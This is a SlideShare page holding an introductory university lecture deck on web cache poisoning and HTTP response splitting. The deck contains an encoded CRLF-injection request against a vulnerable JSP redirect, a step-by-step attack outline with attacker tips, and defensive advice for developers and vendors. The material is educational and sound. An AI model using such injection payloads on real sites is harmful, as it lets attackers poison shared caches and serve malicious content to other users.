Cache poisoning

1.790 Aufrufe

Veröffentlicht am

Introduction presentation about web cache poisoning attacks

Veröffentlicht in: Technologie
0 Kommentare
2 Gefällt mir
  • Als Erste(r) kommentieren

Keine Downloads
Aufrufe insgesamt
Auf SlideShare
Aus Einbettungen
Anzahl an Einbettungen
Gefällt mir
Einbettungen 0
Keine Einbettungen

Keine Notizen für die Folie
  • Cand a fost descoperit, de cine
  • Cache poisoning

    1. 1. Cache Poisoning FCS Iasi, Software Security
    2. 2. Overview Intro Web Cache poisoning Related Attacks About HTTP Response Splitting Attack scenario Practical considerations 2 Software Security, FCS Iasi, 2013-2014
    3. 3. About Web Cache poisoning Domain pioneered by Amit Klein, formerly Director of Security and Research at Sanctum, Inc. Allows an attacker to place malicious content on a shared cache server (such as an proxy server) All users of that cache will continue to receive the malicious content until the cache entry is purged. 3 Software Security, FCS Iasi, 2013-2014
    4. 4. Related attacks & vulnerabilities Web Cache poisoning is based on HTTP Response splitting. The attacker must find a web resource vulnerable to HTTP response Splitting and exploit that vulnerability. Cross-User Defacement is also possible via placing malicious web content for a specific user && stealing sensitive information 4 Software Security, FCS Iasi, 2013-2014
    5. 5. HTTP Response Splitting Forcing an originator of HTTP messages to emit 2 (or more) valid (RFC-compliant) messages instead of one. The result of the application’s failure to reject illegal user input (malicious/unexpected CR&LF characters – may be found especially in Location and Set-Cookie headers) 5 Software Security, FCS Iasi, 2013-2014
    6. 6. Response Splitting Example [5]  JSP page (say <% response.sendRedirect(“/by_lang.jsp?lang=“ + request.getParameter(“lang”)); %>  Normal request:  Normal Response: HTTP/1.0 302 Redirect Location: Connection: Keep-Alive Content-Length: 0 6 Software Security, FCS Iasi, 2013-2014
    7. 7. Example – continued [5]  Attack request %200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0a%0aContentLength:%2020%0d%0a%0d%0a<html>Gotcha!</html>  Response (actually, 2 responses and some change): HTTP/1.0 302 Redirect Location: Will be interpreted as Response # 1 Connection: Keep-Alive Content-Length: 0 HTTP/1.0 200 OK Content-Type: text/html Will be interpreted as Response # 2 !!Injected by attacker!! Content-Length: 20 <html>Gotcha</html> Connection: Keep-Alive Content-Length: 0 … 7 Software Security, FCS Iasi, 2013-2014 Superfluous data, does not conform to the HTTP Standard
    8. 8. Cache Poisoning Attack Difficult to carry-out in real environment. (many conditions and pre-requisites) 1) Find a web resource vulnerable to HTTP Response Splitting 2) Force the cache server to flush the actual cache content (Pragma: no-cache or Cache-Control) 3) Send a specially crafted request, as the previous 4) Send the next request (poisoned resource). The injected Response #2 will server as a response from Step #3 and will be stored by the shared web cache server 8 Software Security, FCS Iasi, 2013-2014
    9. 9. Attacker - Practical Aspects [4] Maintain the poisoned resource Last-Modified header with a future time value Send the cache poisoning attack every x minutes? Execute all requests immediately one after another Take into account the URI length (GET / POST) Attack scenario depends to the web server implementation (Microsoft ASP, Jakarta Tomcat, IBM WebSphere etc.): Where the second message starts? 9 Software Security, FCS Iasi, 2013-2014
    10. 10. Victims – Practical Aspects [4] Web Application Developers VALIDATE INPUT!! Remove CRs and LFs before embedding data to HTTP response headers (Location and SetCookie especially) Web application engine vendors Disallow CR & LF characters in all HTTP response headers (requirement for RFC 2616) Proxy vendors Avoid sharing server TCP connection among different clients / virtual hosts 10 Software Security, FCS Iasi, 2013-2014
    11. 11. Bibliography 1) OWASP page for Web cache poisoning 1) OWASP page for HTTP Response Splitting 1) 2) 3) 4) OWASP Testing guide v3 (section 4.8.15, Testing for HTTP Splitting/Smuggling, pages 278-281) Amit Klein, Http Response Splitting, Web Cache Poisoning Attacks a Amit Klein, HTTP Message Splitting, Smuggling and Other Animals, OWASP AppSec Europe, 2006 China's Great Firewall spreads overseas preads_overseas 11 Software Security, FCS Iasi, 2013-2014